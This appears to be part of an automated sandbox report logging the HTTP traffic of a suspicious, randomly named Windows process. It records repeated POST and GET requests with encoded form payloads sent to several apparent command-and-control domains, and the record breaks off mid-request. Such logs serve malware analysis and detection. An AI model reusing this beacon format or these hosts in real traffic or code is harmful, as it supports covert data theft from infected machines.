                                                      Sep 11, 2024 11:17:57.228420019 CEST780OUTPOST /v2c3/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dalong.site
                                                      Origin: http://www.dalong.site
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.dalong.site/v2c3/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 73 75 65 47 50 30 36 55 32 42 62 61 76 52 31 4f 65 75 4e 54 65 49 4f 33 52 6d 74 34 39 59 4b 52 34 68 30 39 4b 68 78 54 53 51 4e 42 61 76 70 56 34 44 53 57 70 6c 64 4d 4c 4f 6f 2f 32 31 68 75 67 42 62 78 58 57 30 56 36 64 79 44 51 5a 35 47 2b 44 4e 6e 6c 59 7a 59 37 37 2b 42 50 42 33 79 2b 54 73 4d 6c 32 52 74 51 32 77 73 49 6a 6f 41 38 56 34 69 51 4c 43 69 57 68 73 51 2b 6d 5a 52 51 4f 53 35 33 39 34 6e 55 4b 6b 42 67 7a 42 41 78 42 46 72 55 56 38 32 6d 42 4c 6a 54 55 43 57 56 37 52 50 39 56 6a 74 57 63 51 4f 78 54 73 57 2b 47 48 4e 74 4b 71 57 52 72 52 57 58 4b 49 4a 4b 71 62 75 41 55 52 62 56 6c 59 3d
                                                      Data Ascii: pP_8=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YKR4h09KhxTSQNBavpV4DSWpldMLOo/21hugBbxXW0V6dyDQZ5G+DNnlYzY77+BPB3y+TsMl2RtQ2wsIjoA8V4iQLCiWhsQ+mZRQOS5394nUKkBgzBAxBFrUV82mBLjTUCWV7RP9VjtWcQOxTsW+GHNtKqWRrRWXKIJKqbuAURbVlY=
                                                      Sep 11, 2024 11:17:57.660542965 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:17:57 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.463323172.96.187.60803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:17:59.768162012 CEST10862OUTPOST /v2c3/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.dalong.site
                                                      Origin: http://www.dalong.site
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.dalong.site/v2c3/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 31 49 2b 62 6f 39 54 68 6c 45 38 47 73 75 65 47 50 30 36 55 32 42 62 61 76 52 31 4f 65 75 4e 54 65 49 4f 33 52 6d 74 34 39 59 79 52 34 33 6f 39 46 67 78 54 54 51 4e 42 55 50 70 46 34 44 53 62 70 6c 46 49 4c 4f 6b 4a 32 77 39 75 78 58 6e 78 65 43 6f 56 7a 64 79 44 4d 70 34 42 77 6a 4e 2b 6c 59 6a 63 37 2f 61 42 50 42 33 79 2b 52 30 4d 73 44 6c 74 44 6d 77 76 4c 6a 6f 4d 71 56 35 4e 51 4c 71 55 57 68 67 41 35 56 68 52 65 4f 43 35 31 50 51 6e 63 4b 6b 44 6a 7a 41 47 78 42 49 31 55 52 63 51 6d 42 2b 45 54 57 65 57 56 36 52 57 6b 68 54 6c 4a 39 51 64 73 67 34 71 36 68 6a 68 71 4a 2b 50 64 71 56 78 44 65 34 5a 46 4c 6d 68 48 32 35 77 4d 77 69 6b 72 4f 2b 45 62 46 33 53 73 49 53 77 68 78 50 77 69 58 73 4f 74 49 55 62 37 4e 39 2f 4b 4f 34 34 42 4d 54 65 44 4f 72 4e 6c 4b 4c 37 62 43 2b 56 6e 36 33 56 73 6c 54 6c 68 6a 36 35 66 41 59 35 6b 33 56 6d 6d 4b 47 67 70 36 6e 57 36 55 59 69 52 72 72 72 34 48 65 53 58 55 55 55 55 78 66 78 35 45 7a 52 57 7a 51 49 47 30 2b 56 47 6a 62 35 48 36 54 64 53 [TRUNCATED]
                                                      Data Ascii: pP_8=1I+bo9ThlE8GsueGP06U2BbavR1OeuNTeIO3Rmt49YyR43o9FgxTTQNBUPpF4DSbplFILOkJ2w9uxXnxeCoVzdyDMp4BwjN+lYjc7/aBPB3y+R0MsDltDmwvLjoMqV5NQLqUWhgA5VhReOC51PQncKkDjzAGxBI1URcQmB+ETWeWV6RWkhTlJ9Qdsg4q6hjhqJ+PdqVxDe4ZFLmhH25wMwikrO+EbF3SsISwhxPwiXsOtIUb7N9/KO44BMTeDOrNlKL7bC+Vn63VslTlhj65fAY5k3VmmKGgp6nW6UYiRrrr4HeSXUUUUxfx5EzRWzQIG0+VGjb5H6TdSam2oNWQjGm8uO3He1slqVsZQ9Hp1lPL2YQYslIGLJ6s6PGwfQ9/pDxhAjbPJ5Ux9kn4zF9/lV+R9H62aVUGaM6R4Vo6pnPxZ5Iwr4GidIs4N5cIgwt/TKNgLhNthVL+Dwk07TBYjBA/IUuWtOF5+lIBzp4p/DmBQe5k8PQ6k1hXnybwW2ry5FPX0/oqqiaRYdwM9aPnp9/MIyOztGxf1FrTCTU1kGqIo/OW9IUCoe2OxDYYbSfz171zPzr0PL9p3bnzk4m38qR6Jch+VryCIFbtSXBEMk7IDJ3AxgZJyLnqVZcy3NbgwrQoKgcpFZWjPqtSLciKhSQq/OW/S3fusSw/1dKlux20a1bMxnPz4+OAh6JpX6JwtsxN8ZBJZ0UVloa7B0I3EFflzN6TeUdtoTKwlpboBJ8JNGfWbg8UcyG2dM4LYN1iyiDH7nLiibUaykwRFqWhPkPBYmG+OlhU85BOu8sLXeZ+AbwshXt4zqcITPZXqFuBtSp0aZDjKuiq9nC3B9NLbv98F0TLKftQb20JaLdiqMdse5Tj31rjbJkmuA9ifbQzagU9Oxj0L3QRZmOAAQCx2FsKX777FCqbfnxEAjalFR5g5HL/S3Q9TmIkBekTJxBOldcBGX+rgSjA+rS2ohDGcmdReX10iF/7mvz9RXJEGbRLXxC [TRUNCATED]
                                                      Sep 11, 2024 11:18:00.220200062 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:18:00 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.463324172.96.187.60803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:02.308949947 CEST498OUTGET /v2c3/?V0Qh=4pBta8&pP_8=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.dalong.site
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:02.762028933 CEST1033INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 796
                                                      date: Wed, 11 Sep 2024 09:18:02 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.4633253.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:07.814496994 CEST787OUTPOST /xamn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mgeducacaopro.online
                                                      Origin: http://www.mgeducacaopro.online
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mgeducacaopro.online/xamn/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 56 35 70 35 44 62 36 4d 32 32 39 48 4c 39 57 37 52 53 66 2b 41 66 69 74 38 66 51 73 6e 72 7a 77 56 33 64 4c 32 30 74 42 49 6f 4a 6b 34 6b 38 6d 75 73 4b 53 56 39 6f 79 74 78 6f 53 4e 62 53 53 6d 71 7a 73 6e 47 71 34 76 6d 46 36 52 33 41 38 30 49 2b 77 57 58 55 67 78 64 49 6f 51 4a 36 57 56 56 6c 34 61 30 77 35 42 68 49 66 6f 54 34 7a 4f 46 4e 71 36 66 63 2b 42 4f 54 74 76 63 76 77 39 4c 47 4c 2b 55 45 58 49 33 66 59 6d 79 62 42 54 65 59 45 38 35 6e 51 50 67 4e 6e 74 38 30 42 64 48 53 74 63 65 56 65 79 54 42 52 31 78 65 44 57 51 59 6f 35 41 3d 3d
                                                      Data Ascii: pP_8=TKQUtJlMp/1FV5p5Db6M229HL9W7RSf+Afit8fQsnrzwV3dL20tBIoJk4k8musKSV9oytxoSNbSSmqzsnGq4vmF6R3A80I+wWXUgxdIoQJ6WVVl4a0w5BhIfoT4zOFNq6fc+BOTtvcvw9LGL+UEXI3fYmybBTeYE85nQPgNnt80BdHStceVeyTBR1xeDWQYo5A==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.4633263.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:10.359231949 CEST807OUTPOST /xamn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mgeducacaopro.online
                                                      Origin: http://www.mgeducacaopro.online
                                                      Content-Length: 221
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mgeducacaopro.online/xamn/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 66 66 77 55 56 46 4c 33 77 35 42 4a 6f 4a 6b 74 55 38 6e 7a 63 4b 6e 56 39 6b 4d 74 30 51 53 4e 59 75 53 6d 72 44 73 6e 56 43 37 67 57 46 6b 65 58 41 36 35 6f 2b 77 57 58 55 67 78 64 64 67 51 4a 43 57 56 6c 56 34 4c 6c 77 2b 61 42 49 63 2f 6a 34 7a 4b 46 4e 78 36 66 63 59 42 50 50 48 76 65 6e 77 39 4c 57 4c 2b 41 59 55 47 33 66 53 72 53 61 44 62 4e 6c 6a 38 71 65 52 46 43 59 42 77 39 67 4d 52 68 44 33 4e 76 30 4a 67 54 6c 69 6f 32 58 33 62 54 6c 68 69 4e 77 53 6a 58 31 72 75 6d 39 32 63 53 59 53 49 2f 57 66 75 4a 30 3d
                                                      Data Ascii: pP_8=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3kffwUVFL3w5BJoJktU8nzcKnV9kMt0QSNYuSmrDsnVC7gWFkeXA65o+wWXUgxddgQJCWVlV4Llw+aBIc/j4zKFNx6fcYBPPHvenw9LWL+AYUG3fSrSaDbNlj8qeRFCYBw9gMRhD3Nv0JgTlio2X3bTlhiNwSjX1rum92cSYSI/WfuJ0=


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.4633273.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:12.906126022 CEST10889OUTPOST /xamn/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.mgeducacaopro.online
                                                      Origin: http://www.mgeducacaopro.online
                                                      Content-Length: 10301
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.mgeducacaopro.online/xamn/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Data Raw: 70 50 5f 38 3d 54 4b 51 55 74 4a 6c 4d 70 2f 31 46 61 35 5a 35 45 34 69 4d 2b 32 39 45 46 64 57 37 44 53 66 41 41 66 2b 74 38 65 6c 33 6b 65 4c 77 56 67 5a 4c 32 58 46 42 62 59 4a 6b 73 55 38 36 7a 63 4b 36 56 39 73 41 74 30 4d 73 4e 64 71 53 6e 49 62 73 32 30 43 37 37 6d 46 6b 63 58 41 2f 30 49 2b 6c 57 58 6b 6b 78 64 4e 67 51 4a 43 57 56 6e 4e 34 62 45 77 2b 64 78 49 66 6f 54 34 42 4f 46 4d 2f 36 66 46 6a 42 50 62 39 76 50 48 77 38 76 4b 4c 38 7a 77 55 4b 33 66 63 34 69 61 68 62 4e 70 38 38 71 43 6e 46 48 6c 6b 77 39 55 4d 52 6e 4f 36 5a 50 67 70 30 41 35 51 36 33 7a 54 44 7a 74 74 75 76 38 58 74 33 5a 4f 35 31 46 35 54 6a 78 4f 4d 36 57 62 34 4f 73 46 58 71 76 5a 51 36 5a 78 31 61 54 2b 79 38 4e 33 46 74 4a 46 71 68 53 55 6c 67 79 51 69 44 4b 75 56 61 69 6e 63 70 42 34 55 45 74 44 4c 68 50 78 44 2b 49 68 46 6f 30 69 7a 76 6c 43 4c 37 52 61 64 41 42 37 49 4c 35 4a 47 46 57 49 37 64 58 4a 6a 6f 63 30 38 63 62 57 44 4c 54 41 41 76 71 34 69 6b 69 58 74 75 4c 42 54 43 32 4b 65 64 55 6d 52 69 63 57 74 [TRUNCATED]
                                                      Data Ascii: pP_8=TKQUtJlMp/1Fa5Z5E4iM+29EFdW7DSfAAf+t8el3keLwVgZL2XFBbYJksU86zcK6V9sAt0MsNdqSnIbs20C77mFkcXA/0I+lWXkkxdNgQJCWVnN4bEw+dxIfoT4BOFM/6fFjBPb9vPHw8vKL8zwUK3fc4iahbNp88qCnFHlkw9UMRnO6ZPgp0A5Q63zTDzttuv8Xt3ZO51F5TjxOM6Wb4OsFXqvZQ6Zx1aT+y8N3FtJFqhSUlgyQiDKuVaincpB4UEtDLhPxD+IhFo0izvlCL7RadAB7IL5JGFWI7dXJjoc08cbWDLTAAvq4ikiXtuLBTC2KedUmRicWtFz8gbeidxyyOQQS4vyhMEhVdJQlc46YdKBSMc3ea3rxhHaZ70UYUDeYDagCy7Lf7nMaz0kpp+my+BsQygnAXSEXyievW/FwtkaVGmIfx1iET16UTMyhELTK5C4tv0OL+QjkEx4JqCj7N9qO00SKjPbAw0KhLkB5lOfPEv7Hmp1w/PLp+8/JLgEwKv2P8LG45zG2x1kI6e795ivoFKYHLUe6670ZjdUJwwf6SrTc4ElB2U4ICuG+oFLE0WLk5lcOo01/xFiZLqduXf+y88cCE/YVQMdCtY+2mVrJ1oGdEYwnG7+S0wpix3Zw99kU6tSVGNH3ubcYLQGaThLh/1QcNezdRSclH5z4IGYZ19gDF5ewZtqMcrBRlBWz9NVH3SXcmYxA/dM7GO0LNUTWbSPfSdU4frEIZJN1xmDfX73hwPXZfdi3yVhdMhqi9i7ACvjHlqYfNzmxvM+PhRh4pJsUKWMGtFbajBs+Zb0u+BJUoQWOYK4w5Us337UA3s62CQRDtDPWP6q7ULOiRh4wsDe3NYmp6/QarwJowHaWcGF+qPw0xUxMrA+5oraMJNeR3ochnkSCUjjagwSCWkt0yRs5RGzMzk0KU+0TkEZWJNiSsqtw21rx2ccEg3D3AiZ4UTFBsR1RZuF5Ou/gyqMem8ht6m8rvBwdsJXBzkE [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.4633283.33.130.190803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:15.461708069 CEST507OUTGET /xamn/?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.mgeducacaopro.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                                      Sep 11, 2024 11:18:15.905046940 CEST392INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Wed, 11 Sep 2024 09:18:15 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 252
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 70 50 5f 38 3d 65 49 34 30 75 2b 6b 58 6c 36 64 43 4e 4f 78 75 46 4b 62 43 69 67 52 31 4e 38 36 6d 45 67 66 4b 58 50 6e 41 32 6f 52 56 68 35 37 63 62 31 46 4f 79 77 35 61 63 4b 74 31 75 53 56 6b 72 74 4f 47 65 50 55 43 6e 6c 55 51 49 4a 53 37 6b 5a 6a 61 68 53 57 52 36 52 31 61 64 46 6f 70 75 63 57 44 45 32 68 61 36 2f 73 31 50 50 58 44 59 69 70 36 63 46 49 64 44 48 59 3d 26 56 30 51 68 3d 34 70 42 74 61 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?pP_8=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&V0Qh=4pBta8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.46332967.223.117.189803496C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 11, 2024 11:18:21.117927074 CEST763OUTPOST /fava/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate
                                                      Host: www.heldhold.xyz
                                                      Origin: http://www.heldhold.xyz
                                                      Content-Length: 201
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Referer: http://www.heldhold.xyz/fava/
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
